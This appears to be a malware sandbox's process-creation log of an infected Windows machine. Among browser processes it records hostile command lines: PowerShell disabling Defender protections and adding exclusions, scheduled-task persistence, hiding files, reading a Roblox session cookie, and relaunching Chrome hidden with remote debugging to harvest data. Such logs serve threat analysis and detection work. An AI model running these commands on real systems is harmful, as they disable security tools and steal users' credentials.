"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SH.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Systenn.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"
C:\Users\Admin\Desktop\Files\yiklfON.exe
"C:\Users\Admin\Desktop\Files\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe'
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2
C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe'
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Users\Admin\Desktop\Files\W4KLQf7.exe
"C:\Users\Admin\Desktop\Files\W4KLQf7.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3560 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7804 -ip 7804
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 984
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp" /SL5="$604C2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 2260
C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe
"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5792 -ip 5792
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 816
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe"
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Users\Admin\Desktop\Files\steal_stub.exe
"C:\Users\Admin\Desktop\Files\steal_stub.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"
C:\Users\Admin\Desktop\Files\yiklfON.exe
"C:\Users\Admin\Desktop\Files\yiklfON.exe"
C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe
"C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"
C:\Users\Admin\Desktop\Files\steal_stub.exe
"C:\Users\Admin\Desktop\Files\steal_stub.exe"
C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe
"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Users\Admin\Desktop\Files\file.exe
"C:\Users\Admin\Desktop\Files\file.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Oi8sKAHNLo7W.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9586.tmp\9587.tmp\9588.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6100 -ip 6100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1132
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2472,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7480 -ip 7480
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1072
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2384,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4824,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nfdKjErmBbK1.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe"
